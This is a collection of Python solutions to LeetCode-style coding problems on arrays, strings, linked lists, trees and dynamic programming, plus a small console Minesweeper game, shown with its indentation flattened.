"""
class Solution:
def combinationSum3(self, k: int, n: int) -> List[List[int]]:
ans = []
for item in combinations(range(1, 10), k):
temp = list(item)
if sum(temp) == n:
ans.append(temp)
return ans
```
#### File: CodingChallenges/python3/contains_duplicate_3.py
```python
class Solution:
def containsNearbyAlmostDuplicate(self, nums: List[int], k: int, t: int) -> bool:
if t == 0 and len(nums) == len(set(nums)):
return False
for i, cur_val in enumerate(nums):
for j in range(i+1, min(i+k+1, len(nums))):
if abs(cur_val - nums[j]) <= t:
return True
return False
```
#### File: CodingChallenges/python3/contains_duplicate.py
```python
class Solution:
def containsDuplicate(self, nums: List[int]) -> bool:
set_nums = set(nums)
if len(set_nums) < len(nums):
return True
else:
return False
```
#### File: CodingChallenges/python3/convert_to_base7.py
```python
class Solution:
def convertToBase7(self, num: int) -> str:
ans = ''
multi = 1
isNeg = num < 0
num = abs(num)
while multi * 7 <= num:
multi *= 7
while multi >= 1:
ans += str(num // multi)
if num >= 0:
num = int(num % multi)
else:
ans += str(num)
multi //= 7
if isNeg:
ans = '-' + ans
return ans
```
#### File: CodingChallenges/python3/copy_list_with_random_pointer.py
```python
from .model import RandListNode
"""
Space : O(2n)
Time : O(2n)
"""
class Solution:
def copyRandomList(self, head: RandListNode) -> RandListNode:
p = head
# create interweaved list
while p:
# save value to next creation
value = p.val
temp = p.next
# insert copied current node
p.next = RandListNode(value)
p = p.next
# point back to original next
p.next = temp
p = p.next
# migrate random node
p = head
while p:
if p.random:
# save rand
rand = p.random
# insert rand to new rand
p = p.next
p.random = rand.next
p = p.next
else:
p = p.next.next
# create new node
ans = RandListNode(0)
a = ans
p = head
while p:
# move next
p = p.next
# insert to ans
a.next = p
# move to next element
a = a.next
p = p.next
return ans.next
```
#### File: CodingChallenges/python3/count_binary_substrings.py
```python
class Solution:
def countBinarySubstrings(self, s: str) -> int:
ans = 0
last = s[0]
one = 1 if s[0] == '1' else 0
zero = 1 if s[0] == '0' else 0
n = len(s)
for i in range(1, n):
if s[i] != last:
ans += min(one, zero)
if s[i] == '0':
zero = 1
else:
one = 1
else:
if s[i] == '0':
zero += 1
else:
one += 1
last = s[i]
ans += min(one, zero)
return ans
```
#### File: CodingChallenges/python3/determine_if_string_halves_are_alike.py
```python
class Solution:
def halvesAreAlike(self, s: str) -> bool:
n = len(s)
v1, v2 = 0, 0
for i in range(n//2):
if s[i].lower() in ['a', 'e', 'i', 'o', 'u']:
v1 += 1
if s[i+(n//2)].lower() in ['a', 'e', 'i', 'o', 'u']:
v2 += 1
return v1 == v2
```
#### File: CodingChallenges/python3/divide_two_integers.py
```python
class Solution:
def divide(self, dividend: int, divisor: int) -> int:
if dividend == 0:
return 0
is_neg = True if dividend < 0 else False
is_neg ^= True if divisor < 0 else False
dividend = abs(dividend)
divisor = abs(divisor)
ans, count = 0, 1
temp = divisor
while (divisor << 1) <= dividend:
divisor <<= 1
count *= 2
while dividend >= divisor and dividend > 0:
dividend -= divisor
ans += count
while dividend < divisor:
divisor >>= 1
count >>= 1
if divisor < temp:
break
if is_neg:
return -1 * min(ans, (2 ** 31))
return min(ans, (2**31) - 1)
```
#### File: CodingChallenges/python3/duplicate_zeros.py
```python
class Solution:
def duplicateZeros(self, arr: List[int]) -> None:
"""
Do not return anything, modify arr in-place instead.
"""
n = len(arr)
stack = []
i = 0
while i < n:
if arr[i] == 0:
stack.append(0)
stack.append(arr[i])
i += 1
for j in range(n):
arr[j] = stack[j]
```
#### File: CodingChallenges/python3/even_numbers.py
```python
class Solution:
def findNumbers(self, nums: List[int]) -> int:
ans = 0
for i in nums:
if len(str(i)) % 2 == 0:
ans += 1
return ans
```
#### File: CodingChallenges/python3/find_and_replace_pattern.py
```python
class Solution:
def findAndReplacePattern(self, words: List[str], pattern: str) -> List[str]:
ans = []
pn = len(pattern)
for word in words:
if len(word) != pn:
continue
mem1, mem2 = {}, {}
defect = False
for i in range(pn):
if word[i] not in mem1:
mem1[word[i]] = pattern[i]
elif mem1[word[i]] != pattern[i]:
defect = True
break
if pattern[i] not in mem2:
mem2[pattern[i]] = word[i]
elif mem2[pattern[i]] != word[i]:
defect = True
break
if defect:
continue
if len(mem1) == len(mem2):
ans.append(word)
return ans
```
#### File: CodingChallenges/python3/find_first_and_last_position_of_element_in_sorted_array.py
```python
class Solution:
def searchRange(self, nums: List[int], target: int) -> List[int]:
ans = [-1, -1]
s, e = 0, len(nums)-1
if not nums:
return ans
while s < e:
m = (s + e) // 2
if nums[m] < target:
s = m + 1
else:
e = m
if nums[e] != target:
return [-1, -1]
ans[0] = e
e = len(nums)-1
while s < e:
m = ((s + e) // 2)+1
if nums[m] <= target:
s = m
else:
e = m - 1
ans[1] = e
return ans
```
#### File: CodingChallenges/python3/find_the_most_competitive_subsequence.py
```python
class Solution:
def mostCompetitive(self, nums: List[int], k: int) -> List[int]:
stack = []
i = 0
n = len(nums)
while i < n:
while stack and nums[i] < stack[-1] and n-i+len(stack) > k:
stack.pop()
if len(stack) < k:
stack.append(nums[i])
i += 1
return stack
```
#### File: CodingChallenges/python3/fizzbuzz.py
```python
class Solution:
def fizzBuzz(self, n: int) -> List[str]:
ans = []
for i in range(1, n+1):
word = ''
if i % 3 == 0:
word += 'Fizz'
if i % 5 == 0:
word += "Buzz"
if word == '':
word = str(i)
ans.append(word)
return ans
```
#### File: CodingChallenges/python3/flipping_an_image.py
```python
class Solution:
def flipAndInvertImage(self, A: List[List[int]]) -> List[List[int]]:
for row in A:
for i in range((len(row) + 1) // 2):
"""
In Python, the shortcut row[~i] = row[-i-1] = row[len(row) - 1 - i]
helps us find the i-th value of the row, counting from the right.
"""
row[i], row[~i] = row[~i] ^ 1, row[i] ^ 1
return A
```
#### File: CodingChallenges/python3/hamming_distance.py
```python
class Solution:
def hammingDistance(self, x: int, y: int) -> int:
ans = 0
xor = bin(x^y)[2:]
for l in xor:
if l == '1':
ans += 1
return ans
```
#### File: CodingChallenges/python3/house_robber_ii.py
```python
class Solution:
def rob(self, nums: List[int]) -> int:
if len(nums) == 1:
return nums[0]
if len(nums) == 0:
return 0
ans = 0
leng = len(nums)-1
one, two = [0] * leng, [0] * leng
# 1st iteration
for idx in range(leng):
if idx < 2:
one[idx] = nums[idx]
else:
one[idx] = nums[idx] + max(one[idx-2], one[idx-3])
ans = max(ans, one[idx])
# 2nd iteration
for idx in range(leng):
if idx < 2:
two[idx] = nums[idx+1]
else:
two[idx] = nums[idx+1] + max(two[idx-2], two[idx-3])
ans = max(ans, two[idx])
return ans
```
#### File: CodingChallenges/python3/increasing_order_search_tree.py
```python
from .model import TreeNode
"""
Space : O(n)
Time : O(n)
"""
class Solution:
def getInorder(self, root) -> List[int]:
res = []
if root:
res += self.getInorder(root.left)
res.append(root.val)
res += self.getInorder(root.right)
return res
def increasingBST(self, root: TreeNode) -> TreeNode:
if not root:
return root
vals = self.getInorder(root)
# create tree
ans = TreeNode()
head = ans
for i in vals:
head.right = TreeNode(i)
head = head.right
return ans.right
```
#### File: CodingChallenges/python3/insertion_sort_list.py
```python
from .model import ListNode
"""
Space : O(n)
Time : O(n**2)
"""
class Solution:
def insertionSortList(self, head: ListNode) -> ListNode:
if not head:
return head
mem = []
point = head
while point:
mem.append(point.val)
point = point.next
n = len(mem)
stack = []
for i in range(n):
stack.append(mem[i])
j = len(stack) - 1
while j > 0:
if stack[j] < stack[j-1]:
temp = stack[j-1]
stack[j-1] = stack[j]
stack[j] = temp
else:
break
j -= 1
ans = ListNode(stack[0])
p = ans
for i in range(1, len(stack)):
p.next = ListNode(stack[i])
p = p.next
return ans
```
#### File: CodingChallenges/python3/intersection_of_array.py
```python
class Solution:
def intersect(self, nums1: List[int], nums2: List[int]) -> List[int]:
if len(nums1) < len(nums2):
item1 = nums1
item2 = nums2
else:
item1 = nums2
item2 = nums1
credit = {}
for i in item2:
if i in credit:
credit[i] += 1
else:
credit[i] = 1
ans = []
for j in item1:
if j in credit:
if credit[j] > 0:
ans.append(j)
credit[j] -= 1
return ans
```
#### File: CodingChallenges/python3/jump_game.py
```python
class Solution:
def canJump(self, nums: List[int]) -> bool:
n = len(nums)
if n == 1:
return True
cred = 0
i = 0
while True:
cred = max(cred, nums[i])
if cred + i >= n-1:
return True
if cred == 0:
break
i += 1
cred -= 1
return False
```
#### File: CodingChallenges/python3/keyboard_row.py
```python
class Solution:
def findWords(self, words: List[str]) -> List[str]:
ans = []
truth = {
'q': 1,
'w': 1,
'e': 1,
'r': 1,
't': 1,
'y': 1,
'u': 1,
'i': 1,
'o': 1,
'p': 1,
'a': 2,
's': 2,
'd': 2,
'f': 2,
'g': 2,
'h': 2,
'j': 2,
'k': 2,
'l': 2,
'z': 3,
'x': 3,
'c': 3,
'v': 3,
'b': 3,
'n': 3,
'm': 3,
}
for item in words:
oneline = True
check = item.lower()
line = truth[check[0]]
for i in range(1, len(check)):
if truth[check[i]] != line:
oneline = False
if oneline:
ans.append(item)
return ans
```
#### File: CodingChallenges/python3/kth_largest_element_in_an_array.py
```python
class Solution:
def findKthLargest(self, nums: List[int], k: int) -> int:
return sorted(nums)[-k]
```
#### File: CodingChallenges/python3/letter_case_permutation.py
```python
class Solution:
def letterCasePermutation(self, S: str) -> List[str]:
def permute(S, path):
if len(S) == 0:
ans.append(path)
return
if S[0].isalpha():
permute(S[1:], path + S[0].upper())
permute(S[1:], path + S[0].lower())
else:
permute(S[1:], path + S[0])
ans = []
permute(S, '')
return ans
```
#### File: CodingChallenges/python3/linked_list_cycle_II.py
```python
from .model import ListNode
"""
Space : O(1)
Time : O(n)
"""
# Definition for singly-linked list.
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution:
def detectCycle(self, head: ListNode) -> ListNode:
if not head:
return None
h1 = head
h2 = head
cyclical = True
while h1 or h2:
h1 = h1.next
h2 = h2.next
if h2:
h2 = h2.next
if not h2 or not h1:
cyclical = False
break
if h1.val == h2.val:
if h1.next.val == h2.next.val:
break
if not cyclical:
return None
point = head
while True:
if point.val == h1.val:
if point.next.val == h1.next.val:
return point
point = point.next
h1 = h1.next
```
#### File: CodingChallenges/python3/linked_list_cycle.py
```python
from .model import ListNode
"""
Space : O(1)
Time : O(n)
"""
class Solution:
def hasCycle(self, head: ListNode) -> bool:
if not head:
return None
h1 = head
h2 = head
while h1 or h2:
h1 = h1.next
h2 = h2.next
if h2:
h2 = h2.next
if not h2 or not h1:
return False
if h1.val == h2.val:
if h1.next.val == h2.next.val:
break
return True
```
#### File: CodingChallenges/python3/longest_increasing_subsequence.py
```python
from bisect import bisect_left
# Space : O(n)
# Time : O(n log n)
class Solution:
def lengthOfLIS(self, nums: List[int]) -> int:
sub = []
for num in nums:
i = bisect_left(sub, num)
if i == len(sub):
sub.append(num)
else:
sub[i] = num
return len(sub)
```
#### File: CodingChallenges/python3/longest_mountain_in_array.py
```python
class Solution:
def insertStack(self, stack: List[int], direction: str) -> List[int]:
if len(stack) > 0:
if stack[-1][0] == direction:
stack[-1][1] += 1
else:
stack.append([direction, 1])
else:
stack.append([direction, 1])
return stack
def longestMountain(self, A: List[int]) -> int:
"""
Personal Attempt
Space : O(n)
Time : O(n)
"""
ans = 0
n = len(A)
stack = []
for i in range(1, n):
if A[i] > A[i-1]:
stack = self.insertStack(stack, "u")
elif A[i] == A[i-1]:
stack = self.insertStack(stack, "s")
else:
stack = self.insertStack(stack, "d")
m = len(stack)
if m == 1:
return 0
for j in range(m-1):
c1, c2 = stack[j], stack[j+1]
if c1[0] == "u" and c2[0] == "d":
ans = max(ans, c1[1] + c2[1] + 1)
return ans
def longestMountain2(self, A: List[int]) -> int:
"""
Best Solution
Space : O(1)
Time : O(n)
"""
lastup = lastdown = ans = was = 0
for i in range(1, len(A)):
if A[i]-A[i-1] > 0:
lastdown = 0
lastup += 1
elif A[i]-A[i-1] < 0:
if lastup > 0:
was = lastup + 1
lastup = 0
lastdown += 1
if was > 0:
ans = max(ans, was+lastdown)
else:
lastdown = 0
lastup = 0
was = 0
return ans
```
#### File: CodingChallenges/python3/majority_element_2.py
```python
class Solution:
def majorityElement(self, nums: List[int]) -> List[int]:
ans = []
if len(nums) == 0:
return ans
hashmap = {}
N = len(nums)
for i in nums:
if i not in hashmap:
hashmap[i] = 1
else:
hashmap[i] += 1
for k, v in hashmap.items():
if v > int(N/3):
ans.append(k)
return ans
```
#### File: CodingChallenges/python3/max_area_of_island.py
```python
class Solution:
def crawl(self, grid, x, y):
def bfs(dx, dy):
nonlocal area
if grid[dy][dx] == 1:
area += 1
grid[dy][dx] = 0
elif grid[dy][dx] == 0:
return
for ax, ay in c:
if 0 <= dy + ay < row and 0 <= dx + ax < col:
if grid[dy+ay][dx+ax] == 1:
bfs(dx+ax, dy+ay)
row = len(grid)
col = len(grid[0])
c = [(0, 1), (0, -1), (1, 0), (-1, 0)]
area = 0
bfs(x, y)
return area
def maxAreaOfIsland(self, grid: List[List[int]]) -> int:
row = len(grid)
col = len(grid[0])
ans = 0
for y in range(row):
for x in range(col):
if grid[y][x] == 1:
ans = max(ans, self.crawl(grid, x, y))
return ans
```
#### File: CodingChallenges/python3/maximize_distance_to_closest_person.py
```python
class Solution:
def maxDistToClosest(self, seats: List[int]) -> int:
dist1, dist2 = 0, 0
temp1, temp2 = 0, 0
n = len(seats)
for i in range(n):
# forward
if seats[i] == 0:
temp1 += 1
dist1 = max(dist1, temp1)
else:
temp1 = 0
# backward
if seats[n-1-i] == 0:
temp2 += 1
dist2 = max(dist2, temp2)
else:
temp2 = 0
if dist1 % 2 == 1:
mid = (dist1+1) // 2
else:
mid = (dist1) // 2
return max(mid, temp1, temp2)
```
#### File: CodingChallenges/python3/maximum_depth_of_n-ary_tree.py
```python
from .model import NaryNode
# Space : O(n)
# Time : O(n)
class Solution:
def maxDepth(self, root: NaryNode) -> int:
if not root:
return 0
ans = 0
stack = [root]
while stack:
ans += 1
temp = []
for node in stack:
if node:
temp += node.children
stack = temp
return ans
```
#### File: CodingChallenges/python3/maximum_difference_between_node_and_ancestor.py
```python
from .model import TreeNode
"""
Space : O(n)
Time : O(n)
"""
class Solution:
def maxAncestorDiff(self, root: TreeNode) -> int:
if not root:
return 0
ans = 0
stack = [(root, 10**6, -1)]
while stack:
node, minv, maxv = stack.pop()
minv = min(minv, node.val)
maxv = max(maxv, node.val)
if not node.left and not node.right:
ans = max(ans, abs(maxv - minv))
if node.left:
stack.append((node.left, minv, maxv))
if node.right:
stack.append((node.right, minv, maxv))
return ans
```
#### File: CodingChallenges/python3/maximum_product_of_word_lengths.py
```python
class Solution:
def maxProduct(self, words: List[str]) -> int:
def checkContainedKey(a, b):
for k in a.keys():
if k in b:
return True
return False
ans = 0
word_dicts = []
for word in words:
d = {}
m = len(word)
for letter in word:
d[letter] = 1
word_dicts.append(d)
n = len(word_dicts)
for i in range(n):
for j in range(i+1, n):
if not checkContainedKey(word_dicts[i], word_dicts[j]):
ans = max(ans, len(words[i]) * len(words[j]))
return ans
```
#### File: CodingChallenges/python3/min_cost_for_tickets.py
```python
class Solution:
def mincostTickets(self, days: List[int], costs: List[int]) -> int:
num = 366
one, seven, thirty = costs
dp = [0] * num
idx = 0
for i in range(1, num):
dp[i] = dp[i-1]
if i == days[idx]:
dp[i] = min(
one+dp[i-1 if i-1>0 else 0],
seven+dp[i-7 if i-7>0 else 0],
thirty+dp[i-30 if i-30>0 else 0]
)
if idx != len(days)-1:
idx += 1
else:
break
return dp[days[idx]]
```
#### File: CodingChallenges/python3/minesweeper.py
```python
import random
def spawnBombs(mines, row, col):
mines_coords = set()
while mines > 0:
y = random.randint(0, row-1)
x = random.randint(0, col-1)
if (x, y) not in mines_coords:
mines_coords.add((x, y))
mines -= 1
return mines_coords
def createBoard(row, col):
board = []
for i in range(row):
board.append(['O' for j in range(col)])
return board
def calculateBoard(row, col, mine_coords):
board = createBoard(row, col)
c = [(0, -1), (0, 1), (-1, 0), (1, 0),
(-1, -1), (-1, 1), (1, -1), (1, 1)]
for y in range(row):
for x in range(col):
if (x, y) in mine_coords:
board[y][x] = 'X'
for ax, ay in c:
if (0 <= x + ax < col) and (0 <= y + ay < row) and (x + ax, y + ay) not in mine_coords:
if board[y+ay][x+ax] == 'O':
board[y+ay][x+ax] = '1'
elif board[y+ay][x+ax].isdigit():
board[y+ay][x +
ax] = str(int(board[y+ay][x+ax])+1)
return board
def printBoard(board):
rows = len(board)
cols = len(board[0])
for y in range(rows+2):
if y == 0:
line = " "
for x in range(cols):
line += "{} ".format(x)
elif y == 1:
line = " "
for x in range(cols):
line += "= "
else:
line = "{} | ".format(y-2)
for x in range(cols):
line += "{} ".format(board[y-2][x])
print(line)
def openBoard(board, ans_board, x, y):
def dfs(dx, dy):
if board[dy][dx] == 'O':
if ans_board[dy][dx].isdigit():
board[dy][dx] = ans_board[dy][dx]
return board
board[dy][dx] = '_'
for ax, ay in c:
if (0 <= dx + ax < col) and (0 <= dy + ay < row):
dfs(dx + ax, dy + ay)
c = [(0, -1), (0, 1), (-1, 0), (1, 0),
(-1, -1), (-1, 1), (1, -1), (1, 1)]
row = len(board)
col = len(board[0])
dfs(x, y)
return board
def checkIsWin(board, mine_coords):
row = len(board)
col = len(board[0])
for y in range(row):
for x in range(col):
if board[y][x] == 'O' and (x, y) not in mine_coords:
return False
return True
def checkBoard(board, ans_board, mine_coords, x, y):
# hit mine
if (x, y) in mine_coords:
for bx, by in mine_coords:
board[by][bx] = 'X'
return board, "lose"
# already inputted validation
if board[y][x].isdigit() or board[y][x] == " ":
print("coordinate {} {} has already inputted")
print("please choose another coordinate")
return board, "continue"
# check for new hit
board = openBoard(board, ans_board, x, y)
# check if there's still coord to choose
# otherwise, player wins
isWin = checkIsWin(board, mine_coords)
if isWin:
return board, "win"
return board, "continue"
def playGame():
mines = 5
row = 5
col = 10
board = createBoard(row, col)
mine_coords = spawnBombs(mines, row, col)
ans_board = calculateBoard(row, col, mine_coords)
print(mine_coords)
printBoard(ans_board)
result = "continue"
while result == "continue":
printBoard(board)
print("Input coordinate (x y). example: 0 1")
user_input = input()
x, y = user_input.split(" ")
board, result = checkBoard(
board, ans_board, mine_coords, int(x), int(y))
if result == "win" or result == "lose":
printBoard(board)
return result
return result
if __name__ == "__main__":
print("===== MINESWEEPER =====")
print("1. Play game")
print("2. Quit")
print("Enter number: ")
action = input()
if action == '1':
result = playGame()
if result == "win":
print("CONRATULATIONS, YOU WIN!")
elif result == "lose":
print("YOU LOSE!")
```
#### File: CodingChallenges/python3/minimum_depth_of_binary_tree.py
```python
from .model import TreeNode
"""
Space : O(n)
Time : O(n)
"""
class Solution:
def minDepth(self, root: TreeNode) -> int:
if not root:
return 0
res = []
stack = [(root, 1)]
while stack:
node, ls = stack.pop()
if not node.left and not node.right:
res.append(ls)
if node.right:
stack.append((node.right, ls+1))
if node.left:
stack.append((node.left, ls+1))
return min(res)
```
#### File: CodingChallenges/python3/minimum_moves_to_equal_array_elements.py
```python
class Solution:
def minMoves(self, nums: List[int]) -> int:
min_num = min(nums)
ans = 0
for x in nums:
ans += x - min_num
return ans
```
#### File: CodingChallenges/python3/minimum_operations_to_reduce_x_to_zero.py
```python
class Solution:
def minOperations(self, nums: List[int], x: int) -> int:
longest = 0
n = len(nums)
k = sum(nums) - x
d = {}
d[0] = 0
if k == 0:
return len(nums)
i, count = 0, 0
while i < n:
count += nums[i]
d[count] = i+1
if count - k in d:
longest = max(longest, i - d[count-k]+1)
i += 1
if longest > 0:
return n - longest
return -1
```
#### File: CodingChallenges/python3/minimum_unique_sum.py
```python
def getMinimumUniqueSum(arr):
ans = 0
dp = [0] * 7000
for i in arr:
dp[i] += 1
n = len(dp)
for i in range(n-1):
if dp[i] > 1:
dp[i+1] += dp[i] - 1
dp[i] = 1
for j in range(n):
if dp[j] > 0:
ans += j
return ans
```
#### File: CodingChallenges/python3/mirror_reflection.py
```python
import math
class Solution:
def mirrorReflection(self, p: int, q: int) -> int:
"""
Personal Attempt
Space : O(1)
Time : O(n)
"""
# get Highest Common Factor
# T = O(log(ab))
g = math.gcd(p, q)
h, w = p, q
x, y = 0, 0
while True:
if x == w:
mx = -g
elif x == 0:
mx = g
if y == h:
my = -g
elif y == 0:
my = g
x += mx
y += my
if (x, y) == (q, 0):
return 0
if (x, y) == (q, p):
return 1
if (x, y) == (0, p):
return 2
def mirrorReflectionBest(self, p: int, q: int) -> int:
"""
Best Solution
Space : O(1)
Time : O(log(pq))
"""
g = math.gcd(p, q)
m, n = q // g, p // g
if n % 2 == 0:
return 2
return m % 2
```
#### File: CodingChallenges/python3/number_of_1_bits.py
```python
class Solution:
def hammingWeight(self, n: int) -> int:
ans = 0
binary = bin(n)[2:]
n = len(binary)
for i in binary:
if i == '1':
ans += 1
return ans
```
#### File: CodingChallenges/python3/number_of_longest_increasing_subsequence.py
```python
def findNumberOfLIS(self, nums):
N = len(nums)
if N <= 1:
return N
lengths = [0] * N # lengths[i] = longest ending in nums[i]
counts = [1] * N # count[i] = number of longest ending in nums[i]
for j in range(nums):
for i in range(j):
if nums[i] < nums[j]:
if lengths[i] >= lengths[j]:
lengths[j] = 1 + lengths[i]
counts[j] = counts[i]
elif lengths[i] + 1 == lengths[j]:
counts[j] += counts[i]
longest = max(lengths)
return sum(c for i, c in enumerate(counts) if lengths[i] == longest)
```
#### File: CodingChallenges/python3/partition_array_into_three_parts_with_equal_sum.py
```python
class Solution:
def canThreePartsEqualSum(self, arr: List[int]) -> bool:
mean = sum(arr) / 3
if mean % 1 > 0:
return False
mean = int(mean)
count = 0
subarr = 0
for i in arr:
count += i
if count == mean:
count = 0
subarr += 1
if subarr == 3:
return True
return False
```
#### File: CodingChallenges/python3/pascals_triangle.py
```python
class Solution:
def generate(self, numRows: int) -> List[List[int]]:
ans = []
for i in range(1, numRows+1):
temp = []
for j in range(1, i+1):
if (j == 1) or (j == i):
temp.append(1)
else:
temp.append(ans[i-2][j-2] + ans[i-2][j-1])
ans.append(temp)
return ans
```
#### File: CodingChallenges/python3/perfect_number.py
```python
import math
class Solution:
def checkPerfectNumber(self, num: int) -> bool:
if num <=1:
return False
total = 1
s, e = 2, math.ceil(math.sqrt(num))
while s < e:
if num % s == 0:
total += s
total += num // s
s += 1
return total == num
```
#### File: CodingChallenges/python3/permutations.py
```python
from itertools import permutations
# Space : O(n^2)
# Time : O(n!)
class Solution:
def permute(self, nums: List[int]) -> List[List[int]]:
res = []
perm = permutations(nums)
for p in perm:
res.append(list(p))
return res
```
#### File: CodingChallenges/python3/power_of_two.py
```python
class Solution:
def isPowerOfTwo(self, n: int) -> bool:
if n <= 0:
return False
ones = 0
binary = bin(n)[2:]
for i in binary:
if i == "1":
ones += 1
if ones == 1:
return True
return False
```
#### File: CodingChallenges/python3/range_sum_query_2d-immutable.py
```python
class NumArray:
def __init__(self, nums: List[int]):
self.arr = nums.copy()
def sumRange(self, i: int, j: int) -> int:
ans = 0
for idx in range(i, j+1):
ans += self.arr[idx]
return ans
# Your NumArray object will be instantiated and called as such:
# obj = NumArray(nums)
# param_1 = obj.sumRange(i,j)
```
#### File: CodingChallenges/python3/remove_covered_intervals.py
```python
class Solution:
def removeCoveredIntervals(self, intervals: List[List[int]]) -> int:
ans = 0
intervals.sort(key=lambda a: (a[0], -a[1]))
end = 0
for i, j in intervals:
if j > end:
ans += 1
end = max(end, j)
return ans
```
#### File: CodingChallenges/python3/remove_duplicates_from_sorted_array_II.py
```python
class Solution:
def removeDuplicates(self, nums: List[int]) -> int:
n = len(nums)
if n <= 2:
return n
i = 0
while i < len(nums) - 2:
while nums[i] == nums[i+2]:
nums.pop(i)
if i >= len(nums)-2:
break
i += 1
return len(nums)
```
#### File: CodingChallenges/python3/remove_linked_list_elements.py
```python
from .model import ListNode
"""
Space : O(1)
Time : O(n)
"""
class Solution:
def deleteNode(self, head, key):
temp = head
while temp:
if temp.val == key:
temp = temp.next
else:
break
head = temp
prev = head
while temp:
if temp.val == key:
prev.next = temp.next
else:
prev = temp
temp = temp.next
return head
def removeElements(self, head: ListNode, val: int) -> ListNode:
res = self.deleteNode(head, val)
return res
```
#### File: CodingChallenges/python3/reverse_words_in_a_string_iii.py
```python
class Solution:
def reverseWords(self, s: str) -> str:
l = s.split(" ")
for i in range(len(l)):
l[i] = l[i][::-1]
return " ".join(l)
```
#### File: CodingChallenges/python3/score_of_parentheses.py
```python
class Solution:
def scoreOfParentheses(self, S: str) -> int:
ans = 0
pwr = -1
isAdded = False
for l in S:
if l == "(":
pwr += 1
isAdded = False
else:
if not isAdded:
ans += 2 ** pwr
isAdded = True
pwr -= 1
return ans
```
#### File: CodingChallenges/python3/search_in_rotated_sorted_array_II.py
```python
class Solution:
def search(self, nums: List[int], target: int) -> bool:
if len(nums) == 0:
return False
s, e = 0, len(nums)-1
while s <= e:
mid = (s+e) // 2
if nums[mid] == target:
return True
# check left
if nums[s] < nums[mid]:
if nums[s] <= target < nums[mid]:
e = mid - 1
else:
s = mid + 1
elif nums[s] == nums[mid]:
s += 1
# check right
else:
if nums[mid] < target <= nums[e]:
s = mid + 1
else:
e = mid - 1
return False
```
#### File: CodingChallenges/python3/search_insert_position.py
```python
class Solution:
def searchInsert(self, nums: List[int], target: int) -> int:
ans = 0
leng = len(nums)
for idx in range(leng):
if nums[idx] == target:
break
elif nums[idx] > target:
break
ans += 1
return ans
```
#### File: CodingChallenges/python3/short_encoding_of_words.py
```python
class Solution:
def minimumLengthEncoding(self, W: List[str]) -> int:
wset = set(W)
for word in W:
if word in wset:
for i in range(1, len(word)):
wset.discard(word[i:])
print(word, wset)
return len("#".join(list(wset))) + 1
```
#### File: CodingChallenges/python3/single_number_3.py
```python
class Solution:
def singleNumber(self, nums: List[int]) -> List[int]:
hashmap = {}
res = []
for i in nums:
if i in hashmap:
hashmap[i] += 1
else:
hashmap[i] = 1
for key, val in hashmap.items():
if val == 1:
res.append(key)
return res
```
#### File: CodingChallenges/python3/smallest_range_ii.py
```python
class Solution:
def smallestRangeII(self, A: List[int], K: int) -> int:
A.sort()
ans = A[-1] - A[0]
for x, y in zip(A, A[1:]):
ans = min(ans, max(A[-1]-K, x+K) - min(A[0]+K, y-K))
return ans
```
#### File: CodingChallenges/python3/smallest_string_with_a_given_numeric_value.py
```python
class Solution:
def getSmallestString(self, n: int, k: int) -> str:
"""
Personal Attempt
Space : O(1)
Time : O(n)
"""
zs = 0
while k - 26 >= n - 1:
zs += 1
k -= 26
n -= 1
mid = ''
if k > n:
mid = chr(96 + k - n + 1)
k = k - n + 1
n -= 1
return 'a' * n + mid + 'z' * zs
def getSmallestStringBest(self, n: int, k: int) -> str:
"""
Best solution
Math approach
Space : O(1)
Time : O(1)
"""
# let there be x 'a', and z 'z' and maybe another alphabet 'y'
# case 1: no need for y
# 1.x + 26.z = k
# x + z = n
# x + 26(n-x) = k
# 25x = 26n-k
# case 2: y is needed and it can be from 2 to 25
# 1.x + y + 26z = k
# x + z = n - 1 or z = n - 1 - x
# x + y + 26(n - 1 - x) = k
# -25x + y + 26n - 26 - k = 0
# 25x = 26n - k - 26 + y
if (26*n - k) % 25 == 0: # case 1
x = (26*n - k)//25
ans = 'a'*x + 'z'*(n-x)
else: # case 2
temp = 26*n - k - 26
if temp < 0:
x = 0
y = -temp
else:
y = 25-(temp % 25)
x = (temp+y)//25
ans = 'a'*x + chr(ord('a')-1+y) + 'z'*(n-1-x)
return ans
```
#### File: CodingChallenges/python3/squares_of_a_sorted_array.py
```python
class Solution:
def sortedSquares(self, nums: List[int]) -> List[int]:
temp1, temp2, ans = [], [], []
n = len(nums)
i = 0
while i < n:
if nums[i] < 0:
temp1.insert(0, nums[i] ** 2)
else:
temp2.append(nums[i] ** 2)
i += 1
if not temp1:
return temp2
elif not temp2:
return temp1
x, y = 0, 0
while x < len(temp1) and y < len(temp2):
if temp1[x] < temp2[y]:
ans.append(temp1[x])
x += 1
else:
ans.append(temp2[y])
y += 1
if x == len(temp1):
ans += temp2[y:]
if y == len(temp2):
ans += temp1[x:]
return ans
```
#### File: CodingChallenges/python3/strong_password.py
```python
import re
def minimumNumber(n, password):
# Return the minimum number of characters to make the password strong
ans = 0
low = re.findall("[a-z]", password)
if not low:
ans += 1
up = re.findall("[A-Z]", password)
if not up:
ans += 1
dig = re.findall("[0-9]", password)
if not dig:
ans += 1
spe = re.findall("[!@#$%^&*()\-+]", password)
if not spe:
ans += 1
if n + ans < 6:
return 6 - n
return ans
```
#### File: CodingChallenges/python3/sum_root_to_leaf_bin_tree.py
```python
from .model import TreeNode
class Solution:
def sumRootToLeaf(self, root: TreeNode) -> int:
# depth first search
def dfs(node, paths, curr):
if node is None:
return
if not node.left and not node.right:
paths.append(curr+str(node.val))
return
dfs(node.left, paths, curr+str(node.val))
dfs(node.right, paths, curr+str(node.val))
return paths
ans = 0
paths = []
dfs(root, paths, '')
if len(paths) > 0:
for i in paths:
ans += int(i, 2)
return ans
```
#### File: CodingChallenges/python3/teemo_attacking.py
```python
class Solution:
def findPoisonedDuration(self, timeSeries: List[int], duration: int) -> int:
if not timeSeries:
return 0
ans = 0
start = timeSeries[0]
end = timeSeries[0] + duration
for t in timeSeries[1:]:
if t < end:
end = t + duration
else:
ans += (end - start)
start = t
end = t + duration
ans += (end - start)
return ans
```
#### File: CodingChallenges/python3/the_kth_factor_of_n.py
```python
class Solution:
def kthFactor(self, n: int, k: int) -> int:
idx = 0
for i in range(1, n+1):
if n%i == 0:
idx += 1
if idx == k:
return i
return -1
```
#### File: CodingChallenges/python3/toeplitz_matrix.py
```python
class Solution:
def isToeplitzMatrix(self, matrix: List[List[int]]) -> bool:
if len(matrix) == 0:
return True
if len(matrix[0]) == 0:
return True
ly = len(matrix)
lx = len(matrix[0])
for y in range(ly-1):
for x in range(lx-1):
if matrix[y][x] != matrix[y+1][x+1]:
return False
return True
```
